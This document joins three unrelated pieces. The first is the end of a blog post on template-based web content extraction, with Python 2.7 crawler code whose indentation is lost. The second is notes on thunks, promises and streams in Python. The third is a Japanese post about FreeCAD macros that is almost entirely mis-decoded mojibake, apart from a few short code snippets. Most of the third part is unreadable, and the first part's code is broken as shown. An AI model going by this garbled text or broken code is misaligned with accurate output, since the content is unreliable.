2. There is limited headroom for further gains: because the scheme compares pages against standard templates and extracts all meaningful text in one mixed pass, positional and hierarchical information is lost. Clustering alleviates this to some extent, but some sites still fail, and there is not much room for improvement on top of the original method.
3. Visual information is not used. For example, user names cannot be located precisely because the algorithm has no notion of what a user name looks like, whereas a human can tell at a glance. In other words, visual cues are an important signal, and higher precision would require exploiting them.
We look forward to better solutions.
Code #
Python 2.7 code~
The general crawling framework:
#! -*- coding:utf-8 -*-
import requests as rq
import numpy as np
import re
from lxml.html import html5parser
class crawler:
def __init__(self, standard_urls):
self.title = ''
self.emphase_mark = set(['p', 'br', 'em', 'strong', 'b', 'font', 'u', 'a', 'img', 'h1', 'h2', 'h3', 'h4', 'h5', 'sup', 'sub', 'blockquote', 'cite', 'code', 'pre'])
self.standard_urls = standard_urls
self.sess = rq.Session()
self.standard_contents = []
self.find_title = re.compile('<title>([\s\S]*?)</title>').findall
if isinstance(standard_urls, list):
self.standard_dom = self.create_dom(self.standard_urls[0])
self.standard_contents = set([c[1:] for c in self.traverse_dom(self.standard_dom)[1]])
for url in self.standard_urls[1:]:
self.standard_dom = self.create_dom(url)
self.standard_contents = self.standard_contents & set([c[1:] for c in self.traverse_dom(self.standard_dom)[1]])
else:
self.standard_dom = self.create_dom(self.standard_urls)
self.standard_contents = set([c[1:] for c in self.traverse_dom(self.standard_dom)[1]])
self.find_zh = re.compile(u'[\u4e00-\u9fa5]').findall
self.find_zh_en = re.compile(u'[a-zA-Z\d_\u4e00-\u9fa5]').findall
self.find_date = re.compile(u'.*?年.*?月.*?日|发布时间|\d{4}\-\d{1,2}\-\d{1,2}|昨天|前天|今天|小时前|\d{1,2}:\d{2}').findall
def create_dom(self, url):
r = self.sess.get(url)
return html5parser.fromstring(r.content)
def traverse_dom(self, dom, idx=0, tag=''):
content = []
if len(dom) > 0:
tag += (str(dom.tag)+'_')
if dom.tag not in self.emphase_mark:
idx += 1
idx_ = idx
if dom.text and dom.text.strip():
content.append((idx_, tag, dom.text.strip()))
for d in dom:
idx, content_ = self.traverse_dom(d, idx, tag)
content.extend(content_)
if dom.tail and dom.tail.strip():
content.append((idx_, tag, dom.tail.strip()))
elif dom.tag != 'head':
if dom.text and dom.text.strip():
content.append((idx, tag, dom.text.strip()))
if dom.tail and dom.tail.strip():
content.append((idx, tag, dom.tail.strip()))
if (isinstance(dom.tag, str) or isinstance(dom.tag, unicode)) and 'title' in dom.tag and not self.title:
self.title = dom.text.strip() + dom.tail.strip()
return idx, content
def peak(self, d):
r = []
if d[0] > d[1]:
r.append(0)
for i in range(1, len(d)-1):
if d[i] > max(d[i-1], d[i+1]):
r.append(i)
if len(d) >= 3 and d[-1] > d[-2]:
r.append(len(d)-1)
return r
def keep_proba(self, s):
if len(self.find_zh_en(s)) == len(s):
return 1
else:
c0 = len(''.join(self.find_date(s)))
return 1.*(len(self.find_zh(s))+c0)/(len(s))
def crawl_url(self, url, cluster_times=2):
self.title = ''
dom = self.create_dom(url)
content = self.traverse_dom(dom)[1]
content_ = []
for c in content:
if c[1:] not in self.standard_contents:
content_.append(list(c))
content = [content_[0]]
for c in content_:
if c[0] == content[-1][0]:
content[-1] = [c[0], c[1], content[-1][2]+'\n'+c[2]]
else:
content.append(c)
content = [c for c in content if self.keep_proba(c[2]) >= 0.25]
for _ in range(cluster_times):
content_ = content[:]
if len(content_) >= 3:
idxs = [c[0] for c in content_]
idxs = set([idxs[i+1] for i in self.peak(np.diff(idxs))])
content = [content_[0]]
cc = 1
for i in range(1, len(content_)):
if content_[i][0] in idxs:
content[-1][0] = int(content[-1][0]/cc)
content.append(content_[i])
cc = 1
else:
content[-1] = [content[-1][0]+content_[i][0], content[-1][1], content[-1][2]+'\n'+content_[i][2]]
cc += 1
return [c[2] for c in content]
Applying it to forums:
def find_datetime(s):
r = []
for t in s.split('\n'):
l = len(t)*1.
d = re.findall('\d+\-\d+\-\d+ +\d+:\d+', t)
if d and len(d[0])/l > 0.5:
r.append(d[0])
else:
d = re.findall(u'\d+年 *\d+月 *\d+日 +\d+:\d+', t)
if d and len(d[0])/l > 0.5:
d = re.findall(u'(\d+)年 *(\d+)月 *(\d+)日 +(\d+):(\d+)', t)
r.append('%s-%s-%s %s:%s'%d[0])
else:
r.append(None)
return r
def extract_info(b,c):
r = []
for t in b:
dts = find_datetime(t)
t = t.split('\n')
dt = max(dts)
if dt:
idx = dts.index(dt)
r.append((dt, '\n'.join(t[:idx]), '\n'.join(t[idx+1:])))
else:
r.append((None, '\n'.join(t), '\n'.join(t)))
idx = 1 + (sum([c.keep_proba(i[1]) for i in r]) < sum([c.keep_proba(i[2]) for i in r]))
r = [(i[0], i[idx]) for i in r if i[idx]]
if not r[0][0]:
r = r[1:]
rr = [r[0]]
for a,b in r[1:]:
if not a:
rr[-1] = rr[-1][0], rr[-1][1]+'\n'+b
else:
rr.append((a,b))
return rr
if __name__ == '__main__':
c = crawler(['http://bbs.emath.ac.cn/thread-9531-1-1.html', 'http://bbs.emath.ac.cn/thread-2749-1-1.html'])
b = c.crawl_url('http://bbs.emath.ac.cn/thread-9538-1-1.html')
title = c.title
r = extract_info(b,c)
keys = ('publish_date', 'content', 'title', 'author')
final = {}
final['post'] = dict(zip(keys, (r[0][0], r[0][1], title, '')))
final['replys'] = [dict(zip(keys, (i[0], i[1], title, ''))) for i in r[1:]]
import pandas as pd
pd.DataFrame(r)
|
This is a series of notes taken from the Coursera course "Programming Languages" by Professor Dan Grossman. I plan to chain these notes together with the catchy terms that I learnt from the course.
From our last discussion of higher-order functions, we know that functions can be evaluated, stored and passed as arguments just like other variables. Storing a function (a closure) in a variable opens up something new for our code paths: we get to delay the evaluation of parts of the code until they are actually needed.
Let's start from a toy example: we want to define our own if statement in Python. Notice that the syntax and semantics of if require the condition to be evaluated as a boolean, and then either the true expression or the false expression to be evaluated and returned.
# Mimics
# if cond:
#     texpr
# else:
#     fexpr
# Ignore the case where texpr not a callable
def myif(cond, texpr, fexpr):
    return texpr() if cond else fexpr()
Now we use myif in a Fibonacci series calculation:
def myfib(n):
    return myif(
        n == 1 or n == 2,
        lambda: 1,
        lambda: myfib(n-1) + myfib(n-2)
    )
An interesting observation here: when myif is invoked inside myfib, its arguments are two higher-order functions, not just two expressions. This is because at the moment myif is called, we don't know which code path will be executed yet, so we want to delay their execution until it is appropriate. The two code paths are each wrapped in a 0-argument anonymous function, which is often called a thunk.
Next, a few common programming idioms related to thunks and delayed evaluation are introduced.
Promises, delay/force
When we have some large computation to perform, but do not know whether it will actually be needed, we usually wrap the operation inside a thunk. Combining this with memoization, we can create a promise structure.
def delay(f):
    return [False, None, f]

def force(f_promise):
    if not f_promise[0]:
        f_promise[0] = True
        f_promise[1] = f_promise[2]()  # evaluate the stored thunk
        return f_promise[1]
    else:
        return f_promise[1]
delay creates a promise, which is a mutable list whose first element indicates whether the thunk has been used, whose second element saves the result, and whose third element is the thunk that contains the large computation. force checks whether the thunk has been evaluated. If not, it sets the execution flag to True, evaluates the thunk, memoizes the result, and returns it.
Stream
A stream is an infinitely long sequence of values. Computer memory is finite, so we cannot actually store an infinite number of values in memory. To define a stream structure, we use thunks to wrap a stream generator inside the stream structure.
The following code constructs a stream object that produces all natural numbers:
def make_nat_stream():
    def make_n_stream(n):
        return (n, lambda: make_n_stream(n+1))
    return make_n_stream(0)
The stream is defined as a tuple whose first element is the value. The second is a generator that produces the next natural number. When make_n_stream is first invoked, a closure is created for the second element of the tuple. The closure contains the binding for the argument of the next recursive call to make_n_stream, which is n+1, the next natural number.
Example usage:
s0 = make_nat_stream()  # (0, thunk)
s1 = s0[1]()            # (1, thunk)
s2 = s1[1]()            # (2, thunk)
...
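As a small additional sketch (my own helper, not from the course notes), a take function makes it easy to pull the first n values out of such a stream:
def take(stream, n):
    """Return the first n values of a stream built from (value, thunk) pairs."""
    values = []
    for _ in range(n):
        value, rest = stream
        values.append(value)
        stream = rest()        # force the thunk to get the next pair
    return values

print(take(make_nat_stream(), 5))   # [0, 1, 2, 3, 4]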
|
Why I started using FreeCAD
CAD縺ョ蜍牙シキ繧定�ェ鄙偵@縺溘>縺後�√�励Ο繝輔ぉ繝�繧キ繝ァ繝翫Ν莉墓ァ倥↑譛画侭繧ス繝輔ヨ縺ッ縲�鬮倅セ。縺ェ縺ョ縺ァ謇九r蜃コ縺帙↑縺�縲�
縺励g縺�縺後↑縺�縺ョ縺ァ縲√�熊ree CAD縲阪→縺九〒縲∵、懃エ「縺九¢縺溘i縲√◎縺ョ縺セ繧薙∪縲:reeCAD縺悟�コ縺ヲ縺阪◆縲�
繧�繧九��
繧、繝ウ繧ケ繝医�シ繝ゥ繝シ縺�222MB菴阪〒縲√う繝ウ繧ケ繝医�シ繝ォ縺吶k縺ィ548MB縺ォ縺ェ繧九��
繝舌�シ繧ク繝ァ繝ウ0.16.6706縺ッ縲∬ヲ句�コ縺励�ョ騾壹j縲�
蛻晁ヲ九�√ヤ繝シ繝ォ邉サ縺後←縺薙↓繧ゅ↑縺上�√�後◆縺�縺ョ繝薙Η繝シ繝ッ繝シ縺ェ縺ョ縺具シ�シ溘�阪→諤昴▲縺ヲ縺励∪縺」縺溘��
繧ケ繧ソ繝シ繝医@縺溘→縺阪↓陦ィ遉コ縺輔l繧狗判髱「縺ッ縲√え繧ァ繝悶�壹�シ繧ク縺ョ繧医≧縺ェ繝�繧カ繧、繝ウ縺ァ縲√Μ繝ウ繧ッ縺後◆縺上&繧楢イシ縺」縺ヲ縺ゅk譁�蟄励′縲∫ョ�譚。譖ク縺阪↓縺ェ縺」縺ヲ縺�繧九�ゅ�瑚ェャ譏取嶌縺阪�ッ隕九↑縺�縺ァ縺�縺倥k縲肴エセ�シ医◎縺励※縲√�瑚協蜉エ縺吶k縲肴エセ窶ヲ�シ峨↑縺ョ縺ァ縲∫┌隕悶@縺ヲ縲∵焔繧貞虚縺九@蟋九a繧九��
縲後Ρ繧ッ繝ッ繧ッ諢溘〒縲∝、ア隱ュ逞�縺ォ縺ェ縺」縺ヲ縺励∪縺�縲肴エセ縺ィ繧ゅ>縺�縲り�ェ蛻�縺ッ縲�
縺薙�ョ逕サ髱「縺ョ縺セ縺セ縺倥c縲∵桃菴懊〒縺阪↑縺�縺ョ縺ッ縲∝�縺九j蛻�縺」縺ヲ縺�繧九��
縲梧眠縺励>繝輔ぃ繧、繝ォ縲咲ウサ縺ョ繝懊ち繝ウ縺ァ縺ゥ縺�縺帙�ッ縺倥∪繧九s縺�繧搾シ溘♀繧翫c縲�
窶ヲ
縺医�ゅ↑縺ォ繧ウ繝ャ縲√ン繝・繝シ繝ッ繝シ�シ溘←縺�繧�縺」縺溘i繝「繝�繝ェ繝ウ繧ー縺ァ縺阪s縺ョ�シ�
縺�繧�縲√�昴う繝ウ繝医′謇薙※繧九◇�シ�
縺ゅs縺セ繧翫↓繧よゥ溯�ス縺悟、壹☆縺弱k縺溘a縺ォ縲√ラ繝ュ繝�繝励Μ繧ケ繝医〒縲√ヤ繝シ繝ォ繧貞�繧頑崛縺医↑縺後i騾イ繧√k莉墓ァ倥↑繧医≧縺ァ縺吶��
縺薙�ョ驕ク謚櫁い縺ョ莠九r縲√Ρ繝シ繧ッ繝吶Φ繝√→蜻シ縺カ縺昴≧縺ェ縲�
縺ィ繧翫≠縺医★繝ッ繝シ繧ッ繝吶Φ繝√�ッ縲.raft縺ィ縺九�‖rch�シ亥サコ遽会シ滂シ峨→縺九r驕ク繧薙□縲�
Path繧帝∈縺カ縺ィ縲�髮サ豌怜屓霍ッ縺ョ繝代せ繧呈緒縺�縺ヲ縺上l縺昴≧縺�縺励��
菴輔°濶イ縲�莉倥>縺ヲ繧九��
Sketch縺ィDraft縺ョ驕輔>縺悟�縺九▲縺ヲ縺�縺ェ縺�縲�
縺ゥ縺」縺。縺ィ繧ゅ�∫せ縲∫キ壹′謠上¢繧九��
縺ィ繧翫≠縺医★縲.raft縺ァ隧ヲ縺励◆縲�
縺ィ繧翫≠縺医★縲∝次轤ケ蠎ァ讓呻シ�0,0,0�シ峨r謇薙▽縲�
轤ケ縺梧遠縺ヲ繧具シ�
蜊倅ス阪�ッmm
蝓コ譛ャ繧ょ�縺九i縺ェ縺�縺セ縺セ縲√�槭け繝ュ縺ォ謇九r蜃コ縺吶��
繝槭け繝ュ縺ョ險倬鹸讖溯�ス縺後▽縺�縺ヲ繧九��
繝槭け繝ュ縺ィ縺�縺�縺九�√せ繧ッ繝ェ繝励ヨ縺ィ縺�縺�縺九�∽ス輔�ョ險�隱槭↑縺ョ縺句�縺九i縺ェ縺�縺励�:reeCAD蝗コ譛峨�ョ險�隱槭°繧ゅ@繧後↑縺�縺娯�ヲ
閾ェ蛻�縺ョ謗ィ貂ャ縺梧ュ」縺励¢繧後�ー縲√%繧後�ッ縲ヾhade縺ョ繧ケ繧ッ繝ェ繝励ヨ縺ョ縲瑚ィ俶�カ縲阪→縲∝酔縺俶ゥ溯�ス縺ェ縺ッ縺壺�ヲ
縺、縺セ繧翫�;UI縺ョ繝懊ち繝ウ繧偵♀縺励◆繧翫@縺ヲ謫堺ス懊@縺溷��螳ケ繧偵�√お繝�繧」繧ソ縺倶ス輔°縺ォ閾ェ蜍戊ィ倬鹸縺励※縺上l繧九��
縲後�槭け繝ュ繧定ィ倬鹸縺吶k縺溘a縺ョ繝�繧、繧「繝ュ繧ー繧帝幕縺上�阪�懊ち繝ウ縺ァ縲∬ィ倬鹸髢句ァ九��
菫晏ュ倥☆繧句�エ謇�縺梧が縺�縺ョ縺九��
縲梧怙蛻昴↓菫晏ュ倥☆繧句�エ謇�繧帝∈繧薙〒縺上□縺輔>縲阪→陦ィ遉コ縺輔l繧九��
縺薙≧縺�縺�譎ゅ�ッ縲∫オ碁ィ謎ク翫�√→繧翫≠縺医★縲√ョ繧ケ繧ッ繝医ャ繝励′讓ゥ髯千噪縺ォ繧ょ、ァ荳亥、ォ縺ェ縺ッ縺壹��
縺薙�ョ繧ィ繝ゥ繝シ縺ォ蠑輔▲縺九°縺」縺ヲ縲√�熊reeCAD縺、縺九∴縺ュ縺�繝シ縲阪→隲ヲ繧√◆莠コ繧ゅ>繧九�ョ縺ァ縺ッ縺ェ縺�縺�繧阪≧縺九��
縺ィ縺�縺�縺九�√%繧後�ッ縲:reeCAD縺ョGUI縺ョ繝�繧カ繧、繝ウ縺梧が縺�縲�
繧ゅ@縲∽ソ晏ュ倥☆繧句�エ謇�繧帝∈繧薙〒谺イ縺励>縺ョ縺ァ縺ゅl縺ー縲∵怙蛻昴↓繝輔ぃ繧、繝ォ繝�繧、繧「繝ュ繧ー繧貞�コ迴セ縺輔○繧九∋縺阪��
繧ゅ@縺上�ッ縲√ヵ繧。繧、繝ォ蜷阪h繧翫b荳翫↓縲√ヵ繧ゥ繝ォ繝�驕ク謚槭ム繧、繧「繝ュ繧ー繧堤畑諢上@縺ヲ縲√ヵ繧ゥ繝ォ繝�驕ク謚槭☆繧九∪縺ァ縲�髱槭い繧ッ繝�繧」繝悶↓縺吶k縺ケ縺阪��
github縺ォ縺ゅ▲縺溘i縲∬�ェ蛻�縺ァ繧�縺」縺ヲ縺ソ繧医≧縺九→縺セ縺ァ縲∵�昴>謔ゥ繧�縲�
繧ウ繝槭Φ繝峨r遏・繧翫◆縺�讖溯�ス縺ョ繝懊ち繝ウ繧呈款縺礼オゅo縺」縺溘i縲∫キ代�ョ蝗幄ァ偵�懊ち繝ウ繧呈款縺吶→縲∬ィ倬鹸繧堤オゆコ�縺吶k縲�
險倬鹸縺輔l縺溘�槭け繝ュ繧堤キィ髮�縺励◆繧翫�∝ョ溯。後@縺溘j縺吶k縺溘a縺ォ縺ッ縲√Γ繝「蟶ウ縺ソ縺溘>縺ェ繝懊ち繝ウ繧呈款縺吶��
縺薙�ョ逕サ髱「縺九i縲√�槭け繝ュ縺ョ螳溯。後b縺ァ縺阪k縺昴≧縺ェ縲ゆサ翫�ッ縺セ縺�螳溯。後�ッ縺励↑縺�縲ゆサ翫�ッ縲√�檎キィ髮�繝懊ち繝ウ縲阪r謚シ縺吶��
縺吶k縺ィ縲√%繧薙↑諢溘§縺ョ逕サ髱「縺悟�コ縺溘�ッ縺壹��
縺薙�ョ繧�繧頑婿縺�縺ィ縲√お繝ゥ繝シ縺ッ縲∽ク九�ョ繧ケ繝�繝シ繧ソ繧ケ繝舌�シ縺ォ陦ィ遉コ縺輔l繧九��
繧ケ繧ッ繝ェ繝励ヨ縺ョ險倬鹸縺ョ菴輔′縺�縺�縺ョ縺九��
繧ウ繝槭Φ繝峨r遏・繧峨↑縺上※繧ゅ�√◎縺ョ讖溯�ス繧偵せ繧ッ繝ェ繝励ヨ縺ァ菴ソ縺�縺溘a縺ョ繧ウ繝槭Φ繝峨′繝斐Ο縺」縺ィ蜃コ縺ヲ縺上k縲�
竊�
API繝ェ繝輔ぃ繝ャ繝ウ繧ケ�シ育┌謨ー縺ォ縺ゅk繧ウ繝槭Φ繝峨r繧「繝ォ繝輔ぃ繝吶ャ繝磯��縺ォ髮�繧√◆縺�縺代�ョ縲√�励Ο繧ー繝ゥ繝槫髄縺代�ョ蜿冶ェャ�シ峨r隱ュ繧�蠢�隕√′縺ェ縺�縲�
竊�
GUI縺ョ謫堺ス懊〒縺ッ螳溽樟縺励↓縺上>辣ゥ髮代↑蜍穂ス懊r縲’or讒区枚縺ィ縺九→邨�縺ソ蜷医o縺帙※閾ェ蜍募喧縺ァ縺阪k縲�
縺溘→縺医�ー縲’or縺ァ豎コ縺セ縺」縺溷屓謨ー郢ー繧願ソ斐☆縺ォ縺ッ窶ヲ蠕瑚ソー縲�
迚ケ縺ォ縲√�悟コァ讓吶�ッ謨ー蠑上〒陦ィ縺帙k繧薙�ッ縺壹↑繧薙□縺代←縲√ヤ繝シ繝ォ縺檎┌縺�縲阪�碁幕逋コ閠�繧ゅ�√o縺悶o縺悶%縺ョ蜍穂ス懊r縺吶k縺溘a縺�縺代↓繝�繝シ繝ォ繧呈コ門y縺励※縺上l縺ェ縺�繧薙□繧阪≧縺ェ縺√�阪→縺�縺�繧医≧縺ェ繧ソ繧、繝励�ョ繧ケ繧ッ繝ェ繝励ヨ繧呈コ門y縺ァ縺阪k縲�
FreeCAD縺ョ繧ケ繧ッ繝ェ繝励ヨ縺ッ縲∵僑蠑オ蟄舌�ッ窶�*.FCMacro窶昴□縺代←縲∽クュ霄ォ縺ッpython縺�縺」縺溘��
繧�縺」縺ア繧慨hade縺ィ蜷後§隕�鬆倥〒縺ァ縺阪∪縺励◆縲�
python蜍牙シキ縺励※縺�縺ヲ繧医°縺」縺溘�ょ虚縺上◇�シ�
繝槭け繝ュ縺ョ險倬鹸縺ァ謗貞�コ縺輔l繧九ョ繝シ繧ソ縺ッ縺薙s縺ェ諢溘§縲�
# -*- coding: utf-8 -*-
# Macro Begin: C:¥Users¥yusuke¥Desktop¥aaa.FCMacro +++++++++++++++++++++++++++++++++++++++++++++++++
import FreeCAD
Draft.makePoint(0.0,1.0,3.0)
# Macro End: C:¥Users¥yusuke¥Desktop¥aaa.FCMacro +++++++++++++++++++++++++++++++++++++++++++++++++
諡。蠑オ蟄舌�ッ窶�.FCMacro窶昴〒縺励◆縺後�√�縺励m窶�.py窶昴�ョ譁ケ縺悟�縺九j繧�縺吶>縲�
荳∝ッァ縺ォ繧ゅ�ゞTF-8譁�蟄励さ繝シ繝峨�ョ謖�螳�
# -*- coding: utf-8 -*-
縺ィ縺九▽縺代※縺上l縺ヲ繧九@縲�
謾ケ陦後さ繝シ繝峨�ッLF縲�
Windoows縺ッ縲,R+LF縲�
Linux縺ッ縲´F縲�
縺薙%縺ッ縺。繧�縺」縺ィ豌励r莉倥¢縺溘>縲�
# 縺ッ縲√◎縺ョ陦後�ョ繧ウ繝。繝ウ繝医い繧ヲ繝医r諢丞袖縺吶k縲�
萓句、悶→縺励※縲∽ク�陦檎岼縺ョ# 縺ョ蝣エ蜷医�ッ縲∵枚蟄励さ繝シ繝峨�ョ謖�螳壹�ョ譎ゅ↓縲√%縺�縺�縺�譖ク縺肴婿縺後〒縺阪k縲�
隕∫せ縺�縺第嶌縺上→縲�
import FreeCAD
Draft.makePoint(0.0,1.0,3.0)
縺ィ縺ゅk縺娯�ヲ
import窶ヲ
import FreeCAD縺ィ縺�縺�縺ョ縺ッ縲�
python險�隱槭〒縲√Λ繧、繝悶Λ繝ェ�シ�python豬√↓縺�縺�謇�縺ョ繝「繧ク繝・繝シ繝ォ�シ峨r隱ュ縺ソ霎シ繧�縲�
C縺ァ縺�縺�繧、繝ウ繧ッ繝ォ繝シ繝峨�ョ莠九□縺ィ諤昴≧縲�
FreeCAD繧定ェュ繧薙□縺ョ縺ァ縲:reeCAD迚ケ譛峨�ョ繧ウ繝槭Φ繝峨′菴ソ縺医k繧医≧縺ォ縺ェ繧九��
Draft.makePoint(窶ヲ,)
FreeCAD縺ョ繧ウ繝槭Φ繝峨�ョ縲∫せ繧呈遠縺、讖溯�ス縺ィ縺励※縲.raft.makePoint(0.0,1.0,3.0)縺後≠繧九��
()縺ョ荳ュ霄ォ縺ョ謨ー蟄励→縺励※縲∝コァ讓凅yz繧抵シ�mm蜊倅ス阪〒�シ画欠螳壹☆繧九��
繧ウ繝ウ繝槭〒蛹コ蛻�縺」縺ヲ菴ソ縺」縺ヲ縺ュ縲�
縺溘□縺励��
蠑墓焚縺御ク�縺、縺ェ繧悦縺ョ縺ソ縲�
蠑墓焚縺御コ後▽縺ェ繧峨�』,y縺ョ縺ソ縺ィ縺励※繧ゆスソ縺医k縲�
蠑墓焚�シ郁恭隱槭〒縲‖rg縺ィ縺九�‖rgument縺ィ縺具シ峨▲縺ヲ縺�縺�縺ョ縺ッ縲�()縺ョ荳ュ縺ォ蜈・繧後k螟画焚縺ョ莠九〒縲�
螟画焚縺」縺ヲ縺�縺�縺ョ縺ッ縲∝�エ蜷医↓繧医▲縺ヲ縺ッ縲梧焚縲阪〒縺ッ縺ェ縺上※譁�蟄怜��(闍ア隱槭〒縺�縺�string�シ遺�拌bc窶晢シ峨→縺�)縺�縺」縺溘j縺吶k縲�
繧ゅ■繧阪s縲�髢「謨ーDraft.makePoint縺ッ縲∵焚蟄励r蠑墓焚縺ィ縺励※蜿励¢蜿悶k縺九i縲∵枚蟄怜�励r蜈・繧後k縺ィ縲�
>>> Draft.makePoint("aa")
Traceback (most recent call last): File "<input>", line 1, in <module>
File "X:¥ProgramData¥FreeCAD 0.16¥Mod¥Draft¥Draft.py", line 2420, in makePoint
_Point(obj,X,Y,Z) File "X:¥ProgramData¥FreeCAD 0.16¥Mod¥Draft¥Draft.py", line 5168, in __init__
obj.addProperty("App::PropertyDistance","X","Draft","Location").X = xBase.FreeCADError: FreeCAD exception thrown (syntax error)
縺ィ縺九�√お繝ゥ繝シ縺瑚ソ斐▲縺ヲ縺阪◆繧翫☆繧九��
縺薙�ョ繧オ繧、繝医〒縺ッ縲√す繝ウ繧ソ繝�繧ッ繧ケ繝上う繝ゥ繧、繝医�ョ迢ャ迚ケ縺ョ蜀�螳ケ縺ォ縺ェ縺」縺ヲ縺�繧九′縲:reeCAD縺ァ縺ッ縲√お繝ゥ繝シ縺ッ縲∝�ィ縺ヲ襍、縺ァ陦ィ遉コ縺輔l繧九��
繧ウ繝槭Φ繝峨▲縺ヲ譖ク縺�縺溘¢縺ゥ縲√∪縺≫�ヲ繧医¥縺ッ遏・繧峨↑縺�繧薙□縺代←縲∝シ墓焚繧貞女縺大叙縺」縺ヲ菴輔°霑斐☆縺ョ縺ァ縲√さ繝槭Φ繝峨�ョ莠九r縲�髢「謨ー(闍ア隱槭〒縺�縺�function)縺ィ隱ュ繧薙□繧翫@縺セ縺吶h縲�
繝槭け繝ュ縺ョ螳溯。後�ョ莉墓婿縺ッ荳峨▽
繝槭け繝ュ縺ィ繧ケ繧ッ繝ェ繝励ヨ繧偵#縺。繧�豺キ縺懊↓縺励※菴ソ縺」縺ヲ縺セ縺吶��
繧ゅ■繧阪s荳。閠�縺ョ蛹コ蛻・縺後▽縺�縺ヲ縺セ縺帙s縲�
蜷後§諢丞袖縺ァ縺励g�シ�
遏・諱オ陲九→縺九≠繧翫∪縺励◆縺娯�ヲ縺ゥ縺�縺ァ繧ゅ>縺�縺ィ諤昴▲縺ヲ隱ュ繧薙〒縺ェ縺�縲�
繝槭け繝ュ縺ョ螳溯。後�ョ莉墓婿縺ッ縲∽ク峨▽隕九▽縺代∪縺励◆縲�
繝溘ラ繝ェ縺ョ蜀咲函繝懊ち繝ウ
縺。縺ェ縺ソ縺ォ縲√%縺ョ繝懊ち繝ウ縺ッ縲√Δ繝�繝ェ繝ウ繧ー逕サ髱「縺ァ縺ッ髱槭い繧ッ繝�繧」繝厄シ医げ繝ャ繝シ繧「繧ヲ繝茨シ峨@縺溘∪縺セ縲ゅせ繧ッ繝ェ繝励ヨ縺ョ繧ィ繝�繧」繧ソ逕サ髱「縺ォ縺励↑縺�縺ィ縲√い繧ッ繝�繧」繝悶↓縺ェ繧峨↑縺�縲�
python繧、繝ウ繧ソ繝励Μ繧ソ縺ォ逶エ謗・蜈・蜉�
python繧、繝ウ繧ソ繝シ繝励Μ繧ソ繝シ縺ッ縲∬。ィ遉コ�シ槭ヱ繝阪Ν�シ柝ython 繧ウ繝ウ繧ス繝シ繝ォ縺ォ繝√ぉ繝�繧ッ縺ァ蜃コ縺帙k縲�
python繝ヲ繝シ繧カ繝シ縺ィ縺励※縺ッ縲∝�昴a縺九i蜃コ縺励※縺翫>縺ヲ縺サ縺励>豌励b縺吶k縲�
繝槭け繝ュ縺ョ螳溯。後ム繧、繧「繝ュ繧ー�シ茨シ�
螟壼�縺薙l縺�縺代□縺ィ諤昴≧縲�
繧ゅ@縺九☆繧九→縲:reeCAD閾ェ菴薙r縲�
Windows縺ョ繧ウ繝槭Φ繝峨Λ繧、繝ウ竊恥ython繧、繝ウ繧ソ繝励Μ繧ソ
縺九i謫堺ス懊〒縺阪k縺九b縺励l縺ェ縺�縺後�∬ゥヲ縺励※縺ェ縺�縲�
萓九∴縺ー縲’or讒区枚縺ァ縲∫┌謨ー縺ョ轤ケ繧偵�∽ク�螳壽擅莉カ縺ァ謇薙▽縲�
# -*- coding: utf-8 -*-
import FreeCAD
for a in [0,1,2,3,4,5]:
Draft.makePoint(a,0,0.)
轤ケ縺悟�コ縺ヲ譚・縺翫▲縺溪�ヲ�シ�
縺薙�ョ遞句コヲ縺ェ繧峨�∵ゥ溯�ス縺ィ縺励※縺、縺�縺ヲ縺�繧九¢縺ゥ縲√b縺」縺ィ邏ー縺九>譚。莉カ縺ァ繧ゅ�∬�ェ蛻�縺ァ險ュ螳壹〒縺阪k縲�
繧ェ繧、繝ゥ繝シ繧�繧九��
鬥ャ鮖ソ縺ョ荳�縺、隕壹∴縺ァ縺吶′縲√�後が繧、繝ゥ繝シ縺ァ譖ク縺�縺溘し繧、繝ウ縲√さ繧オ繧、繝ウ縺ョ隍�邏�謨ー繧�3D縺ァ窶ヲ縲阪▲縺ヲ縺ョ繧偵d繧九��
# -*- coding: utf-8 -*-
import math
import FreeCAD
euler = lambda n, k, N: math.e**(-1j*n*k*2.0*math.pi/float(N))
N = 64
k = 3
for i in range(N):
b = euler(i,k,N)
Draft.makePoint(i, b.real, b.imag)
縺ァ縺代◆縲�
髱「繧貞シオ縺」縺ヲ縺ソ繧九��
逕サ蜒上�ョ繧医≧縺ォ繧�縺」縺溘i縺ァ縺阪◆縲�
繝ッ繝シ繧ッ繝吶Φ繝}art縺ョ荳ュ縺ォ縺ゅk繝�繝シ繝ォ繧剃スソ縺」縺溘��
FreeCAD縺ョ繧、繝ウ繧ケ繝医�シ繝ォ縺ッ縲√〒縺阪l縺ー繝ュ繝シ繧ォ繝ォ縺ォ縺励◆縺�
FreeCAD繧偵う繝ウ繧ケ繝医�シ繝ォ縺吶k縺ィ縺阪�ッ縲√Ο繝シ繧ォ繝ォ縺ォ菫晏ュ倥@縺滓婿縺後>縺�縲�
閾ェ蛻�縺ッ縲√Ο繝シ繧ォ繝ォ縺ョ繧ケ繝壹�シ繧ケ縺檎強縺�驛ス蜷井ク翫�∝、夜ΚHDD縺ォFreeCAD繧偵う繝ウ繧ケ繝医�シ繝ォ縺励◆繧薙□縺代←縲√>縺。縺�縺。驕�縺�縲�
繝�繝シ繝ォ繧帝∈謚槭@縺溘j縲∫せ繧呈遠縺」縺溘j縺吶k縺溘�ウ縺ォ縲√Ρ繝ウ繝�繝ウ繝晞≦繧後k縲�
髟キ譎る俣菴ソ縺�縺ョ縺ァ縺ゅl縺ー縲√%縺ョ繧ソ繧、繝�繝ゥ繧ー縺ッ縲√°縺ェ繧願協逞帙��
縺ァ縺阪l縺ー縲√Ο繝シ繧ォ繝ォ繝�繧」繧ケ繧ッ縺ォ菫晏ュ倥&繧後◆縺励��
縲後ヮ繝シ繝�PC縲√�槭え繧ケ辟。縺励�阪〒謫堺ス懊☆繧九↑繧峨�√�槭え繧ケ險ュ螳壼ソ�鬆�
繝弱�シ繝�PC縺ィ縺�縺�縺九�√Λ繝�繝励ヨ繝�繝励→繧りィ�縺�縺セ縺吶′窶ヲ縲�
